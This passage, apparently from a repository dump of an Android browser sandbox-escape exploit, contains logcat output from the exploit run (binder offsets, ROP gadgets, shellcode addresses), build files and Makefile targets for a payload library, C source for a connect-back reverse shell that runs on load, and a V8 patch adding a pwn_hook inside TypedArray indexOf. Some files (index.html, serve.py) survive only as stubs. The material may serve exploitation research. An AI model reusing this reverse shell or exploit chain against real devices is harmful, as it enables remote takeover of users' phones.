98 | ``` 99 | 100 | The exploit also produces debug output in logcat with the PWN tag. To see it, 101 | simply run `adb logcat | grep PWN`. 
It should produce output similar to this:
102 |
103 | ```
104 | 11-04 16:33:08.269 31606 31634 D PWN     : [*] Binder mapping at 0xc97eb000
105 | 11-04 16:33:08.269 31606 31634 D PWN     : [*] Found binder fd 9
106 | 11-04 16:33:08.272 31606 31634 D PWN     : [*] IParentProcess handle is 5
107 | 11-04 16:33:08.275 31606 31634 D PWN     : [*] Transaction size max fdeb8
108 | 11-04 16:33:08.275 31606 31634 D PWN     : [*] Target user_address: c97eb148
109 | 11-04 16:33:08.276 31606 31634 D PWN     : [*] Target binder offset: 64
110 | 11-04 16:33:08.276 31606 31634 D PWN     : [*] Fake PTR offset: 7c
111 | 11-04 16:33:08.276 31606 31634 D PWN     : [*] Valid PTR offset: a4
112 | 11-04 16:33:08.276 31606 31634 D PWN     : [*] Shellcode size: 0x160
113 | 11-04 16:33:08.286 31606 31634 D PWN     : [*] libc: 0xf1585000 , libc size: 0xb6000
114 | 11-04 16:33:08.289 31606 31634 D PWN     : [*] Found gadget 0 at 0xf163024c
115 | 11-04 16:33:08.290 31606 31634 D PWN     : [*] Found gadget 1 at 0xf15dfcdc
116 | 11-04 16:33:08.291 31606 31634 D PWN     : [*] Found gadget 2 at 0xf15ce0a9
117 | 11-04 16:33:08.292 31606 31634 D PWN     : [*] Found gadget 3 at 0xf15e8c6f
118 | 11-04 16:33:08.293 31606 31634 D PWN     : [*] Found gadget 4 at 0xf15ee10d
119 | 11-04 16:33:08.293 31606 31634 D PWN     : [*] Found gadget 5 at 0xf15ae24d
120 | 11-04 16:33:08.295 31606 31634 D PWN     : [*] Found gadget 6 at 0xf160ebfc
121 | 11-04 16:33:08.297 31606 31634 D PWN     : [*] Found gadget 7 at 0xf1619335
122 | 11-04 16:33:08.297 31606 31634 D PWN     : [*] Found gadget 8 at 0xf15d38df
123 | 11-04 16:33:08.298 31606 31634 D PWN     : [*] Found gadget 9 at 0xf15bb2b8
124 | 11-04 16:33:08.299 31606 31634 D PWN     : [*] Found gadget 10 at 0xf15e4774
125 | 11-04 16:33:08.300 31606 31634 D PWN     : [*] Found gadget 11 at 0xf15dfbb8
126 | 11-04 16:33:08.302 31606 31634 D PWN     : [*] Handle: 0xec965cd8, open: 0xf15eb281
127 | 11-04 16:33:08.311 31606 31634 D PWN     : [*] Linker mapping at 0xf39d6000, size b9000
128 | 11-04 16:33:08.311 31606 31634 D PWN     : [*] Found linker dlopen: 0xf39f30b9
129 | 11-04 16:33:08.311 31606 31634 D PWN     : [*] fake_object_addr: c97eb2e8
130 | 11-04 16:33:08.311 31606 31634 D PWN     : [*] Register scratch space: f163b6e8
131 | 11-04 16:33:08.311 31606 31634 D PWN     : [*] Final shellcode expected at c97eb658
132 | 11-04 16:33:08.311 31606 31634 D PWN     : [*] Final shellcode location 30309000
133 | 11-04 16:33:08.311 31606 31634 D PWN     : [*] Shellcode copy at 30308800
134 | 11-04 16:33:08.337 31606 31634 D PWN     : [*] transaction return code: 0
135 |
136 | ```
137 |
--------------------------------------------------------------------------------
/sandbox/index.html:
--------------------------------------------------------------------------------
[index.html's markup was stripped in this dump. It is a minimal page that triggers the hooked TypedArray indexOf described above; the script block that originally occupied lines 8-17 is gone, and only the visible body text "Test." survives.]
--------------------------------------------------------------------------------
/sandbox/reverse_shell/Android.mk:
--------------------------------------------------------------------------------
1 | LOCAL_PATH := $(call my-dir)
2 | include $(CLEAR_VARS)
3 | LOCAL_MODULE := payload
4 | LOCAL_CFLAGS += -Iinclude
5 | LOCAL_SRC_FILES := src/reverse_shell.c
6 |
7 | #include $(BUILD_EXECUTABLE)
8 | include $(BUILD_SHARED_LIBRARY)
9 |
10 |
--------------------------------------------------------------------------------
/sandbox/reverse_shell/Application.mk:
--------------------------------------------------------------------------------
1 | APP_ABI := armeabi-v7a
2 | APP_PLATFORM := android-24
3 | APP_BUILD_SCRIPT := Android.mk
4 |
5 |
--------------------------------------------------------------------------------
/sandbox/reverse_shell/Makefile:
--------------------------------------------------------------------------------
1 | # Assume ndk-build is in the path
2 | NDK_BUILD := NDK_PROJECT_PATH=. ndk-build NDK_APPLICATION_MK=./Application.mk
3 | # Retrieve binary name from Android.mk
4 | BIN := $(shell cat Android.mk | grep LOCAL_MODULE | head -n1 | cut -d' ' -f3)
5 |
6 | #BIN_PATH := libs/armeabi-v7a/$(BIN)
7 | BIN_PATH := libs/armeabi-v7a/lib$(BIN).so
8 |
9 | all: android
10 |
11 | $(BIN_PATH):
12 | $(NDK_BUILD)
13 |
14 | android:
15 | @echo "Building Android"
16 | $(NDK_BUILD)
17 |
18 | push: $(BIN_PATH) $(LOADER)
19 | adb push $(BIN_PATH) /data/local/tmp/$(notdir $(BIN_PATH))
20 |
21 | shell: push
22 | adb shell /data/local/tmp/$(BIN)
23 |
24 | clean:
25 | $(NDK_BUILD) clean
26 | -adb shell rm /data/local/tmp/$(notdir $(BIN_PATH))
27 |
28 | distclean: clean
29 | $(RM) -rf libs obj
--------------------------------------------------------------------------------
/sandbox/reverse_shell/src/reverse_shell.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <stdlib.h>
3 | #include <unistd.h>
4 | #include <sys/socket.h>
5 | #include <netinet/in.h>
6 |
7 | #include <arpa/inet.h>
8 |
9 |
10 | void reverse_shell(char *ip, int port){
11 |
12 | /* Fork twice so the connect-back shell runs in its own orphaned process. */
13 |
14 | int pid = fork();
15 |
16 | if (pid != 0)
17 | return;
18 |
19 | pid = fork();
20 | if (pid != 0)
21 | return;
22 |
23 | struct sockaddr_in sa;
24 | int s;
25 |
26 | sa.sin_family = AF_INET;
27 | sa.sin_addr.s_addr = inet_addr(ip);
28 | sa.sin_port = htons(port);
29 |
30 | s = socket(AF_INET, SOCK_STREAM, 0);
31 | connect(s, (struct sockaddr *)&sa, sizeof(sa));
32 |
33 | dup2(s, 0);
34 | dup2(s, 1);
35 | dup2(s, 2);
36 |
37 | char *sh_argv[] = {"/system/bin/sh", NULL}; execve(sh_argv[0], sh_argv, NULL);
38 |
39 | }
40 |
41 |
42 | int __attribute__((constructor)) main(void)
43 | {
44 |
45 | reverse_shell("127.0.0.1", 5555);
46 | }
--------------------------------------------------------------------------------
/sandbox/serve.py:
--------------------------------------------------------------------------------
1 | import SocketServer
2 | import struct
3 |
4 | def p32(x):
5 | return struct.pack("<I", x)
[the remainder of serve.py was lost to markup-stripping in this dump]
--------------------------------------------------------------------------------
/sandbox/v8.diff:
--------------------------------------------------------------------------------
[the diff header and the pwn_hook declaration (original lines 1-18) were lost to markup-stripping in this dump]
19 | + if (args.length() > 3) {
20 | +
21 | +
22 | + uint8_t* buffer = static_cast<uint8_t*>(array->DataPtr());
23 | + size_t element_size = array->element_size();
24 | + size_t size = array->length() * element_size;
25 | +
26 | + if (pwn_hook)
27 | + return Smi::FromInt(pwn_hook(buffer, size));
28 | +
29 | + return Smi::FromInt(1337);
30 | +
31 | + }
32 | +
33 | if (args.length() > 2) {
34 | Handle<Object> num;
35 | ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
36 | --------------------------------------------------------------------------------